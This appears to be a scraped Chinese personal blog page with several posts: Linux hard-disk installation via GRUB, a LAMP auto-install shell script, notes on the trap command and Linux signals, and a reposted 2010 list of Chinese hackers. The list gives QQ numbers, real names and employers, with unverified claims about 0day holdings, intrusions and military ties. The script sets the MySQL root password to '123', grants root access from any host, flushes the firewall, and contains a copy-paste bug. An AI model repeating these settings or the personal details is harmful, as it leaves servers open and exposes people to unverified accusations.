硬盘下安装linux

公司新来一批设备,主板没有IDE口,IDE光驱就不能用了。

用USB光驱装,竟然不能初始化过来,郁闷死了、我要安装的linux系统,太老了,驱动应该支持的少。

没有办法,公司没有sata光驱,只能硬盘安装了。

在另一个linux系统上,上传linux镜像iso。再把iso里面的isolinux文件提取出来。

这个文件,大家都知道吧,安装引导文件。

从一个linux启动,进入grub,就是刚刚进去系统时的东西,进入grub命令行(按”c“)。

kernel (hd0,0)/路径/isolinux/vmlinuz

initrd(hd0,0)/路径/isolinux/initd.img

boot

进入安装界面,选择硬盘安装。选择iso的目录就行,不

2010新编中国顶级黑客圈内人物资料和QQ,微博以及博客详解

2010新编中国顶级黑客圈内人物资料和QQ,微博以及博客详解文章作者:
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
百晓生_民间杂志【民间交流 民间技术 民间文化 民间舆论】
我只是在写自己所想到的杂志 我只是菜鸟!

主页博客相册|个人档案 |好友
查看文章   

【转帖】2010新编中国顶级黑客圈内人物资料和QQ,微博以及博客详解
2010年10月06日 星期三 下午 08:06
强大的黑客,强大的资料,以后就跟着这榜单混了,呵呵!

郑重声明:

小心是网络捧杀,中国黑客威胁论,最近是多事之秋。

小心是网络捧杀,中国黑客威胁论,最近是多事之秋。

小心是网络捧杀,中国黑客威胁论,最近是多事之秋。

!!!!!!!!!!!!!!!!!!!!!!

——————————————————————————————————————————

祝各位大牛国庆节快乐.

本文足以轰动一下.各大网站编辑抓紧第一时间发布

2010新编中国顶级黑客圈内人物资料和QQ,微博以及博客详解

首先最主要注明的是:排名不分先后

本名单第一部分罗列的黑客都是真正拥有技术和才能者。并非大多数人平时在电视中所看到的那些盗号或入侵网站的“黑客”,电视里报道的那些人只是黑客界最底 层的人。例如熊猫烧香的作者,其实技术并不高,在黑客圈中大多数人都只是把这个病毒当作一个玩具。而技术含量高超的病毒都是类似于29A发布的那种。

本文作者自我介绍。毕业于哈尔滨工业大学,2001年出道黑客圈,曾在国内多个黑客论坛潜水多年。参加过2004年国内顶级黑客大会XCON(安全焦点峰 会)(PS:扯淡)。2003年就职过国际顶级搜索引擎公司GOOGLE,后因个人原因离职。在黑客界有一定人缘基础。所以本文有一定权威性。至于我是 谁,避免被人追杀还是不明说了。下面开始正文:
第一部分列举老牌黑客。中国黑客界早期技术很牛的人。都是真正的高手。现在大部分技术还是不减当年,数一数二,是普通人望尘莫及的。

在下面这些人中很多人手握众多危害极大的未公开漏洞。就是圈内所称的0day。这类危害极大的0day一般在黑市上可以卖的数十万人民币。
本文原始发布地址: https://docs.google.com/leaf?id= ... out=list&num=50
一切内容以上面博客原文为准
注:以下列举的黑客当然只是一部分,其实还有很多的前辈级黑客。只不过现在基本都告别技术行业了。下面的人物中大部分还在相关领域活动,所以优先列出了。

sunwear
QQ:47347
微博: http://t.qq.com/sunwe4r
博客: 好像不用了
日娃哥。EST核心成员。圈内皆知他手握很多未公开漏洞。渗透入侵和漏洞方面的高手,曾是编程内核牛人。曾经入侵过世界顶级黑客组织Metasploit,剑桥大学等众多高端机构。几年前的世界最顶级两大黑客大会defcon和blackhat都对他有过报道。

刺 QQ:32750912
微博:http://t.qq.com/aullik5
博客:
刺哥,大风哥。身材瘦弱。是中国黑客圈内纯技术黑客组织幻影旅团创始人。中国顶级黑客之一。目前好像就职于淘宝公司网络安全部门。也是手握很多未公开漏洞 的人。很多影响力很大的0day都是出自幻影旅团。WebZine的发起人。并且发展过WIKI的系统。还曾远赴美国参加世界顶级黑客大会 blackhat。。

dm
QQ:不详
微博:http://t.qq.com/zoeluk
博客:
国内顶级地下黑客组织0x557核心成员。是漏洞挖掘,利用方面的高手。不用说,手里的漏洞也是多的可以批发了。目前就职于世界著名反病毒杀毒软件公司麦咖啡(刚刚被intel收购)。现在还写起了iphone,ipad下的安全软件。看来是个全能选手。

flashsky
QQ:38062 & 16202253
博客:
微博:http://t.qq.com/flash-sky
方兴。闪空哥。国内著名黑客组织安全焦点核心成员。2003年WINDOWS历史上最严重安全漏洞细节全球首发者,数百个高危级安全漏洞发现者,历任启明 星辰,美国EEYE,美国微软特聘安全专家,美国微软BLUEHAT第一个中国演讲者,安全焦点成员,南京翰海源信息技术有限公司创始人和CEO。对漏洞 方面的研究是相当高深的。预祝公司发展顺利。

tombkeeper
QQ:644909
博客:
微博:http://t.qq.com/tombkeeper
于某。传说中的tk教主。国内著名黑客组织安全焦点核心成员。就职于绿盟科技,俗称妇科圣手。对windows操作系统以及漏洞等方面的研究可以说是非常精通。而在安全焦点论坛,最近几年一直被人奉为TK教主。对于其他领域的科学也有着独到的见解。文笔思想也是很独特的。

glacier
QQ:1973435
微博:http://t.qq.com/glacier
黄鑫。冰河哥。黄总。同为国内著名的黑客组织安全焦点核心成员。深圳大成天下的创始人之一。是中国最早的远程控制木马"冰河"的作者,也是著名安全扫描工 具"x-scan"的作者。黑客编程方面的高手,对于网络协议,加密安全以及软件工程有很深的了解。女黑客wollf的老公。一个风趣幽默的人。从微博上 就可以看出来了。已经当父亲了,当然孩子不是木马,是一个帅哥。再此祝福一下。

swan
QQ:不详
微博:http://t.qq.com/Swan557
0x557(SST)核心成员,对于linux,windows操作系统上的漏洞可谓了如指掌。

goodwell
QQ:19558287
微博:http://t.qq.com/goodwell
龚蔚。安致信息技术有限公司。中国早起黑客组织绿色兵团创始人,是传说中的中国黑客教父。曾经接受过中央电视台的参访。是以为资深的魔兽世界玩家。

xundi
QQ:518860
微博:http://t.qq.com/idnuxzhang
张迅迪。国内早期的著名黑客组织安全焦点创始人。具体就不过多介绍了,因为不熟悉,哈哈。

lion
QQ:21509
微博:http://t.qq.com/coollion
林勇。中国红客联盟创始人。跟大多网民在网上所了解到的中国红客大联盟不同。这个才是真正的中国红客联盟。至于所谓的sharpwinner,我只能用一句文明用语敏感词来形容“SB”“草泥马”。现在对于技术不如当年,而且已经远离技术告别当初了。

isno
QQ:1070681
微博:http://t.qq.com/isnoblah
安全焦点核心成员之一。目前就职于北京中航嘉信公司。曾经写过很多漏洞溢出方面的分析利用文章(WEBDAV,IDQ,IDA等)。exploit也写过很多。现在较为低调。

天行
QQ:911189
微博:http://t.qq.com/tian_xing 好像不怎么用
中国第一代黑客之一。在1999年曾经与发动对国外网站的攻击。网络刺客,网络卫兵是其代表作品。而他对溢出和漏洞利用也颇有研究,例如RPC漏洞利用程序。以及他写的后门都很好。

quack
微博:http://t.qq.com/wulujia
吴鲁佳。深圳达成天下创始人。与中国木马之父黄鑫关系很好。安全焦点早期活跃之人,ID:quack。

icbm
QQ:不详
http://t.qq.com/icbmx2 基本不用
赵伟。知道创宇创始人之一。曾经就职于国内著名信息安全公司启明星辰积极防御实验室。对各操作系统以及第三方软件的漏洞有很深的了解,手下的未公开漏洞很多。包括基于web方面的一些独特漏洞。

sowhat
QQ:不详
http://t.qq.com/secsecsec
薛峰。就职于某保密单位。曾赴美国参加过国际顶级黑客大会blackhat。手握很多未公开漏洞。好像今年中国顶级黑客盛会xcon上还抽奖中了一台PS3。

vxk
QQ:86879759
微博:http://t.qq.com/cvcvxk
几年前活跃于国内著名病毒论坛CVC。是国内知名的病毒专家。对操作系统内核以及编程,逆向,破解非常精通。可谓程序全能专家。

refdom
微博:http://t.qq.com/refdom
安全焦点核心成员之一。曾经是中国红客联盟的一员。

watercloud
微博:http://t.qq.com/watercloud
知道创宇公司创始人之一。与icbm关系甚好。安全焦点核心成员之一。对漏洞,加密解密等方面有者多年的研究经验,网络安全趋势与发展有着独到的见解。最主要的还是对漏洞,0day方面,手握0day数量也很客观。

alert7
QQ:415451
博客:
安全焦点核心成员之一。曾经就职与著名杀毒软件MCAFEE。目前就职于南京翰海源(Flashsky的公司)。对linux 方面的研究经验长达10年以上。对于linux等开源系统漏洞溢出分析利用了如指掌。

袁哥
博客:
传说中的袁哥。没错,中国所有圈内顶级黑客无不佩服的人。就只与绿盟科技。袁哥在数学,编程,漏洞等诸多方面的造诣是无人可以比拟的。很多漏洞要早其它人数年之久就已经发现并且完美利用了。堪称漏洞方面的其人。黑客界的顶级高手。

sunx
QQ:239670
孙华。国内非常著名的黑客编程高手,对漏洞溢出与利用和有研究,写过EXPLOIT。例如IDA漏洞和printer。在9X年代用汇编写过病毒。并且还编写过操作系统后门程序。

funnywei
QQ:25044885
魏强。F博士。安全焦点核心成员之一。漏洞挖掘,漏洞利用方面的高手,在历届国内顶级黑客盛会XCON上都能见到他的身影。据传就职于中国人民解放军XXX部。为中国人民解放军提供很多未公开漏洞。

小榕
中国早期著名黑客软件“流光”“逆雪”“乱刀”“黑客字典生成器”“ARPSNIFFER”“命令行注入工具”等黑客软件作者。目前对于漏洞方面等技术不如以上几人。不过对于中国黑客界的贡献还是不可小觑的。

xikug
QQ:53564797
国内著名内核,漏洞,程序研究站debugman的站长。逆向,破解,加密,解密,内核等方面的高人。

baoz
微博:http://t.qq.com/perlish
方勇。包子。fatb。多年前就活跃于中国黑客界。活跃程度和人缘还是不错的。目前就职与迅雷公司。有大牛曾说是个带眼镜的胖子。为人厚道,皮肤较黑。

wzt
QQ:71579912
微博:http://t.qq.com/wztjlh
曾经的中国红客联盟核心成员。对于linux内核,以及linux漏洞方面颇有研究。

czy
QQ:484323
四川的一个著名黑客,比较低调,但地下交流圈子中交流频繁。手握很多0day的高手。

zzzevazzz
QQ:49322630
博客:http://zzzevazzz.bokee.com/
国内著名黑客组织幻影旅团核心成员。早期混迹于灰色轨迹。曾经著名的do all in cmdshell 作者。曾经在安全焦点普及ntsd知识,红极一时。对于windows内核以及漏洞方面有着深入的了解和经验。曾经写过很多有利于大众的文章,分享过很多 宝贵的经验。

vessial
QQ:不详
微博:http://t.qq.com/vessial
同dm一样就职于国际顶级杀毒软件安全厂商麦咖啡公司。也是一位对于漏洞等方面有诸多经验的高手。

bkbll
qq:78384349
dumplogon。BK哥。中国红客联盟核心成员之一。2001年中美黑客大战时期技术还是初级的,但也算早期了。后来对溢出,漏洞以及逆向分析方面颇有研究,技术不错。是lion的好朋友。

killer
微博:http://t.qq.com/dongzhiqiang
博客:
董志强。安全焦点核心成员之一。曾经就只与启明星辰公司。对于病毒与防病毒,逆向工程与破解等方面有多年的研究经验。目前为著名安全产品超级巡警的BOSS。

coolq
qq:49462335
就职于绿盟科技的linux方面高手。在绿盟期刊上曾发有著作。对于开源系统有着多年的应用开发经验。linux,unix,bsd内核方面以及漏洞挖掘,利用方面也有着多年的经验。

pjf
qq:85863144
博客:http://pjf.blogcn.com/
国内著名antirootkit工具icesword的作者。是内核方面的专家。国内著名安全软件公司奇虎360公司的核心开发人员。

lcx
海洋顶端网站长,是国内渗透入侵方面的高手,有着多年的入侵经验。是中国网马教父之一。安全手册的顾问。

村长
QQ:6021240
国内顶级黑客组织0x557(SST)创始人。是国内著名信息安全公司启明星辰积极防御实验室的BOSS。对windows,linux非常了解,拥有多年的漏洞挖掘,利用的经验。

casper
QQ:843525
华永兴安BOSS。国内顶级黑客大会xcon的主办方,也是安全焦点创始人之一。中国黑客界的老前辈。目前已经脱离技术领域,向老板发展了。

e4gle
QQ:1949479
国内著名黑客组织WSS核心成员。老一代的黑客。对linux,unix下的溢出漏洞分析以及利用有着多年的研究经验,并且对病毒也很了解。
——————–华丽的分割线———————-

下面将列举一些新生力量,虽然是新生,但起码都是3-6年前左右就开始活跃的人,所以还算是中生代黑客。

mj0011
QQ:保密,避免骂他的人太多。
博客:
就职于国内著名安全公司奇虎360。为核心工程师。圈内敌人无数,只因口无遮拦,相貌丑陋等缺点所导致。对瑞星,金山等公司曾经常出言讽刺,另外连国际顶 级安全厂商赛门铁克也不放过。可谓毒舌娘子,连我也被骂过好几次。话说回来,对于编程,内核,木马,远控方面的技术还是不可否定的。

baiyuanfan
QQ:51449276
曾经著名的后门程序BYSHELL的作者。曾经在某界安全焦点峰会上有过演讲议题,技术还是不错的。

zwell
QQ:27592430
网站:http://www.nosec.org
白远方。曾经NB联盟核心成员。现在为诺塞科技的老大。诺塞科技的产品现在也广为圈内所知,例如穿山甲,JSKY等工具。对编程和注入WEB方面的东西也是很精通的。

sudami
qq:527463097
微博:http://t.qq.com/sudami
博客:
目前就职于国内著名杀毒软件安全软件厂商奇虎360公司。是后起的windows编程,内核之秀。对渗透攻击,入侵方面技术基本为零。曾在邪恶八进制,DEBUGMAN等论坛发表过多篇原创文章。对技术很有追求,进步很快的一个牛人。

oldjun
微博:http://t.qq.com/seuhacker
博客:http://www.oldjun.com/
QQ:34680304
t00ls核心成员。asp,php等WEB脚本方面的高手,对于渗透入侵,WEB渗透相当精通。

9xiao
博客: & www.9xiao.net
微博:http://t.qq.com/deioncube
t00ls核心成员,原火狐联盟的人。

aono
QQ:13335589
微博:http://t.qq.com/air-storm
t00ls核心成员。无线安全方面的高手。在无线网络安方面有其独特的技术思想和经验。

云舒
QQ:21287305
微博:http://t.qq.com/yunshuy
是幻影旅团的核心成员之一,目前同axis一同就职于淘宝公司。其实也算的上是一位比较有资历的老人了。应该位列在上面。写过synflood方面代码。

明小子
QQ:830540
网站:http://www.hackdiy.com/
黑客动画吧的人。著名的明小子旁注工具domain的作者。相比很多菜鸟都以及享受过这个工具的实惠了。其实技术只能说是一般。不过入行也不久了。注入脚本以及简易的编程还是不错的。

鬼仔
QQ:359421
博客:http://huaidan.org
目前就职于新浪公司。WEB应用安全方面的高手。

lake2
QQ:http://t.qq.com/mrhupo
微博:http://t.qq.com/mrhupo
脚本,数据库,渗透方面的高手。目前就职于腾讯QQ公司。

neeao
QQ:35789112
WEB应用安全及脚本方面的高手。

u#0h4x0r
博客:http://www.noahacker.com/
QQ:645041992
对JAVA有一定了解,对渗透也有一些研究。入侵过不少无辜网站。

hmily
qq:68857640
微博:http://t.qq.com/Hmily_LCG
博客:
吾爱破解的BOSS。是程序破解,软件破解,加密解密,逆向工程方面的高手。破解过很多大家常用的工具,如穿山甲。

xi4oyu
博客:http://www.pentestday.com/ &
微博:http://t.qq.com/evil_xi4oyu
qq:909473606
linux方面的高手。

猪猪
QQ:82648 & 100298
岁月联盟站长。入行也有几年了。曾经参加过爱国反击黑客战。也入侵过不少圈内的同行网站。对ASP,注入方面比较了解。

rayh4c
qq:30039780
博客:
微博:http://t.qq.com/rayh4c
茄子宝。80SEC核心成员。对xss,CSRF等脚本漏洞非常精通。经验丰富。

superhei
QQ:123230273
微博:http://t.qq.com/hi_heige
幻影旅团核心成员。曾经写过著名的php注入漏洞利用工具。发现过很多国内流行的php程序漏洞。是WEB脚本,数据库方面的专家。

ring04h
QQ:153520368
博客:
EST核心成员。与国内顶级黑客sunwear关系甚好。曾一同入侵过国内最著名的两大PHP论坛。此人对php,数据库等方面相当精通。

冰血封情
QQ:310926
博客:http://weblog.eviloctal.com/
EST创始人。传说中的中国第四代黑客。据传说已经自己开公司,很久不做技术了。

冰的原点
QQ:519249638
博客:
微博:http://t.qq.com/icezone
黑客手册常见的人。是入门级黑客书籍《黑客渗透笔记》的原作者。对于初学者来说还是有一定学习价值的。

friddy
博客:http://www.friddy.cn
QQ:568623
专门搞漏洞挖掘的人,虽然技术上跟最上面的那些大牛级黑客比差一些,但相对来说还是不错的。另外也对入侵检测有所研究。

余弦
qq:331861985
微博:http://t.qq.com/evilcos
xeye成员。目前就职于icbm的知道创宇公司,是web,脚本等方面的高手。

教主
QQ:130138438
网站:www.jiaozhu.org
圈内名气还算比较大的,主要还是因为他刷库赚钱很多。并且赔的也比较快。呵呵。技术不怎么样,但很能买很能卖。

剑心
QQ:369458956
微博:http://t.qq.com/nullnull
方小顿。80sec站长。目前就职于百度公司,曾经跟百度公司老板李彦宏一起参加过芒果台的娱乐节目,一曲成名。不久前因为发布nginx的漏洞而又一次成名,是WEB安全,应用安全方面的高手。

陆羽
QQ:170093007
微博:http://t.qq.com/T00ls_Luyu
博客:http://www.5luyu.cn
t00ls核心成员,曾经编写过不少注入,旁注方面的辅助入侵工具,例如t00ls内部旁注工具,GETWEBSHELL等等。目前就职于奇虎360公司。

爱无言
QQ:348450419
EST核心成员。对于漏洞挖掘,溢出利用,网络脚本安全方面有着多年经验。在国内著名黑客杂志黑客防线上发表过上百篇的文章。

樱花浪子
QQ:305446947
博客:http://www.hacklu.net/
SQL注入,WEB应用渗透技术还行。在一些黑客杂志上有过一些技术类文章。

h4k_b4n
QQ:616222
微博:http://t.qq.com/h4k_b4n
BCT核心成员。是WEB安全,脚本,数据库安全方面的高手,曾经发现过很多著名程序的漏洞。

pt007
QQ:7491805
彭涛。就职于国内著名信息安全公司,启明星辰。是ISTO的创始人。对oracle,mysql等数据库已经php等脚本非常精通。有多年的开发维护测试等安全经验。著名的xp/2k/2k3完美克隆用户的程序就是他的杰作。

majun
QQ:45539511
马俊。据说是个很能装的人。不过还是有点技术,另外还传说他是sunwear的徒弟。可能得到的真传0day有不少。那入侵网站就如鱼得水了。

shadow
QQ:26727179
博客:
影子。渗透高手。perl等脚本方面的高手。

xiaomi
QQ:5980740
小米。T00ls的创始人之一。人缘还是不错的。

cnbird
QQ:441303228
博客:http://blog.csdn.net/cnbi
rd2008

微博:http://t.qq.com/cnbird2008
如果大家经常看国内的黑客杂志肯定对这个不陌生。linux,windows全方面的渗透高手。有一定的入侵经验。

hackest
QQ:297521327
博客:http://www.hackest.cn/
微博:http://t.qq.com/hackest
也是搞入侵渗透的。不久前一直在卖LMHASH,MD5的彩虹表。

惘然
博客:http://www.wangran.net/
搞渗透的

4ngel
博客:http://www.sablog.net/blog/
sablog的作者。著名的安全天使站长,现在广为流行的几个WEBSHELL都是他写的,有些是从他大代码上改的。对WEBSHELL行业有着不可磨灭的贡献,也是早期很多PHP程序漏洞的发现者。

xhacker
QQ:66680800
小叮当。据说当年入侵过绿盟,也是混迹于黑客圈很久的人了。搞渗透不错。

冷漠
QQ:386817
博客:fhodhttp://www.lengmo.net/
红狼联盟的创始人。目前好像跟着某前辈黑客做事。

fhod
QQ:1988415
博客:http://0day.kr/
目前好像跟着EST的老大打工。在渗透入侵方面也是有一定经验的,曾经写过一些文章。后来还因为黑站被抓。

冰sugar
博客:http://sebug.cn/
朱巨源。写过入门级的文章。在X档案有过投稿。也写过书《黑客攻防实战入门》。对一般的渗透技术有一定了解。

虫子
QQ:712663200
博客:http://evilh4ck.blog.sohu.com/
虫总据说是入侵过不少游戏官方网站。看来应该赚了些钱。此人对入侵攻击还是有很多了解的。

amxking
博客:http://amxking.bokee.com
QQ:5711277
红狼的核心成员,也是天阳的管理。

七剑
QQ:7259561
博客:http://1v1.name
微博:http://t.qq.com/qijian
搞WEB脚本,数据库,渗透攻击的。

啊D
QQ:9269563
网站:http://www.d99net.net/
入行时间不短了,写过一些比较出名的工具,如早期的啊D网络工具包和后来的啊D注入工具。从这些可以看出对注入,编程是有一定了解的。经验比较丰富,工具虽然有BUG但还算稳定。

雨夜
QQ:9148357
博客:
混迹黑客全也有数年。技术凑合。曾经也开办过黑客网站。

redbin
QQ:35475
网站:http://www.vip8.org/
红滨。校园黑客联盟站长。

自动安装脚本

LAMP自动安装脚本,为工作的时候,天天敲命令,autoinstall。

很垃圾的、没有什么华丽的语言、N年后,看看自己写的,能笑什么样、

安装程序就不拿出来了、代码如下:

<code>

#!/bin/sh

#autoinstall 自动安装脚本
#本脚本用于hrjd server安装使用
#跑去文档,傻瓜式安装。
#没有自动判断文件功能
#应该遵循文件名称,不然报错
#注意错误提示,及时排错
#所有安装文件必须放在/root/hrjd下面

#2010.10.09 by:key1088

#jiance code
ls /usr/cis7|grep server > test1
ps aux|grep httpd|grep -v grep >> test1
if [ -s test1 ];then
rm -f test1
echo -e " 33[31m----------------jiance-------------- 33[0m"
echo -e " 33[33m------server----- 33[0m"
ps aux|grep server|grep -v grep
echo -e " 33[33m------lowlessip----- 33[0m"
ps aux|grep lowlessip|grep -v grep
echo -e " 33[33m------guard----- 33[0m"
ps aux|grep guard|grep -v grep
echo -e " 33[33m------httpd port----- 33[0m"
netstat -an|grep :80
echo -e " 33[33m------mysql port----- 33[0m"
netstat -an|grep :3306
echo -e " 33[33m------mode----- 33[0m"
lsmod |grep blackwhite
echo -e " 33[33m------mybridge----- 33[0m"
ifconfig mybridge|grep "inet addr:"
echo -e " 33[31m----------------jiance-------------- 33[0m"
exit
fi
#setup code
cd /root/hrjd/
printf "Start Auto Install hrjd Server SoftWare      33[32m[ok] 33[0mn"
printf " 33[32m----------------bridge setuping------------------- 33[0mn"
tar zxvf bridge-utils-1.0.6.tar.gz
cd bridge-utils-1.0.6
printf " 33[32m----------------configure --prefix=/usr------------------- 33[0mn"
./configure --prefix=/usr
printf " 33[32m----------------make------------------- 33[0mn"
make
printf " 33[32m----------------make install------------------- 33[0mn"
make install
printf " 33[32m----------------make done------------------- 33[0mn"
cd /etc/sysconfig/network-scripts/
if [ -f ifcfg-eth0 ]; then
echo "DEVICE=eth0" > ifcfg-eth0
echo "ONBOOT=yes" >> ifcfg-eth0
echo "TYPE=Ethernet" >> ifcfg-eth0
echo "BRIDGE=mybridge" >> ifcfg-eth0
echo -e " 33[32mifcfg-eth0 config ok 33[0m"
fi
if [ -f ifcfg-eth1 ]; then
echo "DEVICE=eth1" > ifcfg-eth1
echo "ONBOOT=yes" >> ifcfg-eth1
echo "TYPE=Ethernet" >> ifcfg-eth1
echo "BRIDGE=mybridge" >> ifcfg-eth1
echo -e " 33[32mifcfg-eth1 config ok 33[0m"
fi
if [ -f ifcfg-eth2 ]; then
echo "DEVICE=eth2" > ifcfg-eth2
echo "ONBOOT=yes" >> ifcfg-eth2
echo "TYPE=Ethernet" >> ifcfg-eth2
echo "BRIDGE=mybridge" >> ifcfg-eth2
echo -e " 33[32mifcfg-eth2 config ok 33[0m"
fi
if [ -f ifcfg-eth3 ]; then
echo "DEVICE=eth3" > ifcfg-eth3
echo "ONBOOT=yes" >> ifcfg-eth3
echo "TYPE=Ethernet" >> ifcfg-eth3
echo "BRIDGE=mybridge" >> ifcfg-eth3
echo -e " 33[32mifcfg-eth3 config ok 33[0m"
fi
if [ -f ifcfg-eth4 ]; then
echo "DEVICE=eth4" > ifcfg-eth4
echo "ONBOOT=yes" >> ifcfg-eth4
echo "TYPE=Ethernet" >> ifcfg-eth4
echo "BRIDGE=mybridge" >> ifcfg-eth5
echo -e " 33[32mifcfg-eth4 config ok 33[0m"
fi
if [ -f ifcfg-eth5 ]; then
echo "DEVICE=eth5" > ifcfg-eth5
echo "ONBOOT=yes" >> ifcfg-eth5
echo "TYPE=Ethernet" >> ifcfg-eth5
echo "BRIDGE=mybridge" >> ifcfg-eth5
echo -e " 33[32mifcfg-eth5 config ok 33[0m"
fi
echo "DEVICE=mybridge" > ifcfg-mybridge
echo "BOOTPROTO=static" >> ifcfg-mybridge
echo "ONBOOT=yes" >> ifcfg-mybridge
echo "TYPE=Bridge" >> ifcfg-mybridge
echo "NETMASK=255.255.255.0" >> ifcfg-mybridge
echo "IPADDR=192.168.0.204" >> ifcfg-mybridge
echo "GATEWAY=192.168.0.1" >> ifcfg-mybridge
echo "STP=on" >> ifcfg-mybridge
if [ -f ifcfg-mybridge ]; then
echo -e " 33[32mifcfg-mybridge config ok 33[0m"
fi
printf " 33[32m----------------bridge Done------------------- 33[0mn"
cd /root/hrjd
printf " 33[32m----------------MySql Setup------------------- 33[0mn"
cp my.cnf /etc/my.cnf
rpm -ivh mysql-client-5.0.22-0.i386.rpm
sleep 1
rpm -ivh mysql-devel-5.0.22-0.i386.rpm
sleep 1
rpm -ivh mysql-shared-5.0.22-0.i386.rpm
sleep 1
rpm -ivh mysql-server-5.0.22-0.i386.rpm
ps aux|grep mysql|grep -v grep > test1
if [ -s test1 ];then
echo -e " 33[32m----mysql runing ok---- 33[0mn"
mysqladmin -u root password 123
mysql -uroot -p123 -e "grant all on *.* to 'root'@'%' identified by '123'"
mysql -uroot -p123 -e "flush privileges"
iptables -F
rm -r test1
echo -e " 33[32m----------------MySql Setup Done-------------- 33[0mn"
else
echo -e " 33[31m----mysql no runing---- 33[0mn"
echo -e " 33[31m----mysql Setup error"
fi
printf " 33[32m---------------Apache Setup------------------- 33[0mn"
tar zxvf httpd-2.2.9.tar.gz
cd httpd-2.2.9
printf " 33[32m------------Apache ./config------------------- 33[0mn"
./configure --prefix=/usr/local/apache2 --enable-so -enable-rewrite
printf " 33[32m----------------Apache make------------------- 33[0mn"
make
printf " 33[32m----------Apache make install----------------- 33[0mn"
make install
cd /root/hrjd
cp -a ruqinjiance/ /usr/local/apache2/htdocs/
mv /usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/httpd.conf.bak
cp -a httpd.conf /usr/local/apache2/conf/httpd.conf
printf " 33[32m-------------Apache Setup Done---------------- 33[0mn"
printf " 33[32m-----------------PHP Setup-------------------- 33[0mn"
tar zxvf php-5.2.11.tar.gz
cd php-5.2.11
printf " 33[32m----------------PHP ./config ----------------- 33[0mn"
./configure --prefix=/usr/local/php5 --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql=/usr/bin/mysql --with-config-file-path=/usr/local/apache2/conf --enable-sockets
make
make install
cd /root/hrjd
mv /usr/local/php5/php.ini /usr/local/php5/php.ini.bak
cp php.ini /usr/local/php5/php.ini
printf " 33[32m----------------PHP Setup Done----------------- 33[0mn"
printf " 33[32m---------------HRJD SERVER Setup--------------- 33[0mn"
cp /root/hrjd/hrjd.tar /usr/hrjd.tar
cd /usr
tar xvf hrjd.tar
cd /root/hrjd
chmod 755 rc.local
mv /etc/rc.d/rc.local /etc/rc.d/rc.local.bak
cp /root/hrjd/rc.local /etc/rc.d/rc.local
ls /dev/|grep hda > test1
if [ -s test1 ];then
echo -e " 33[32m------------IDE HD ID--------------"
hdparm -i /dev/hda|grep SerialNo
echo -e "------------IDE HD ID-------------- 33[0m"
rm -rf test1
else
chmod 777 sata
echo -e " 33[32m------------SAST HD ID--------------"
./sata
echo -e "------------SAST HD ID-------------- 33[0m"
fi
printf "HRJD Server setup ok"
getchar() {
    stty cbreak -echo
    dd if=/dev/tty bs=1 count=1 2> /dev/null
    stty -cbreak echo
}
printf " 33[32m-----------------press any key reboot----------------- 33[0m"
ret=`getchar`
echo
reboot

</code>

好好学习一个编程

以后要好好学习一下编程,思量也好,语言也好。
不想半途而废啊,学好了,做什么也有用哦。
有事的时候写写程序,学学习,
没事的时候构思个美女,写出来,给兄弟几个乐呵乐呵。
加油!!!
嘿嘿

如何使用命令trap来捕捉信号

  它有三种形式分别对应三种不同的信号回应方式.
第一种:
trap "commands" signal-list
trap "commands" 数字
当脚本收到signal-list清单内列出的信号时,trap命令执行双引号中的命令.
第二种:
trap signal-list
trap不指定任何命令,接受信号的默认操作.默认操作是结束进程的运行.
第三种:
trap "" "" signal-list
trap命令指定一个空命令串,允许忽视信号.
Linux信号简介
1) SIGHUP 本信号在用户终端连接(正常或非正常)结束时发出, 通常是在终端的控制进程结束时, 通知同一session内的各个作业, 这时它们与控制终端不再关联.
2) SIGINT 程序终止(interrupt)信号, 在用户键入INTR字符(通常是Ctrl-C)时发出
3) SIGQUIT 和SIGINT类似, 但由QUIT字符(通常是Ctrl-)来控制. 进程在因收到SIGQUIT退出时会产生core文件, 在这个意义上类似于一个程序错误信号.
4) SIGILL 执行了非法指令. 通常是因为可执行文件本身出现错误, 或者试图执行数据段. 堆栈溢出时也有可能产生这个信号.
5) SIGTRAP 由断点指令或其它trap指令产生. 由debugger使用.
6) SIGABRT 程序自己发现错误并调用abort时产生.
7) SIGIOT 在PDP-11上由iot指令产生, 在其它机器上和SIGABRT一样.
8) SIGBUS 非法地址, 包括内存地址对齐(alignment)出错. eg: 访问一个四个字长的整数, 但其地址不是4的倍数.
9) SIGFPE 在发生致命的算术运算错误时发出. 不仅包括浮点运算错误, 还包括溢出及除数为0等其它所有的算术的错误.
10) SIGKILL 用来立即结束程序的运行. 本信号不能被阻塞, 处理和忽略.
11) SIGUSR1 留给用户使用
12) SIGSEGV 试图访问未分配给自己的内存, 或试图往没有写权限的内存地址写数据.
13) SIGUSR2 留给用户使用
14) SIGPIPE Broken pipe
15) SIGALRM 时钟定时信号, 计算的是实际的时间或时钟时间. alarm函数使用该信号.
16) SIGTERM 程序结束(terminate)信号, 与SIGKILL不同的是该信号可以被阻塞和处理. 通常用来要求程序自己正常退出. shell命令kill缺省产生这个信号.
17) SIGCHLD 子进程结束时, 父进程会收到这个信号.
18) SIGCONT 让一个停止(stopped)的进程继续执行. 本信号不能被阻塞. 可以用一个handler来让程序在由stopped状态变为继续执行时完成特定的工作. 例如, 重新显示提示符
19) SIGSTOP 停止(stopped)进程的执行. 注意它和terminate以及interrupt的区别: 该进程还未结束, 只是暂停执行. 本信号不能被阻塞, 处理或忽略.
20) SIGTSTP 停止进程的运行, 但该信号可以被处理和忽略. 用户键入SUSP字符时(通常是Ctrl-Z)发出这个信号
21) SIGTTIN 当后台作业要从用户终端读数据时, 该作业中的所有进程会收到SIGTTIN信号. 缺省时这些进程会停止执行.
22) SIGTTOU 类似于SIGTTIN, 但在写终端(或修改终端模式)时收到.
23) SIGURG 有紧急数据或out-of-band数据到达socket时产生.
24) SIGXCPU 超过CPU时间资源限制. 这个限制可以由getrlimit/setrlimit来读取/改变
25) SIGXFSZ 超过文件大小资源限制.
26) SIGVTALRM 虚拟时钟信号. 类似于SIGALRM, 但是计算的是该进程占用的CPU时间.
27) SIGPROF 类似于SIGALRM/SIGVTALRM, 但包括该进程用的CPU时间以及系统调用的时间.
28) SIGWINCH 窗口大小改变时发出.
29) SIGIO 文件描述符准备就绪, 可以开始进行输入/输出操作.
30) SIGPWR Power failure

linux 启动过程中 init加载的一些程序失败 导致系统起不来。

都知道init是linux第一个调用程序,他是系统老大哥。
系统启动过程中不起来,以下几点。加载内核或驱动时候错误,那是内核的问题。
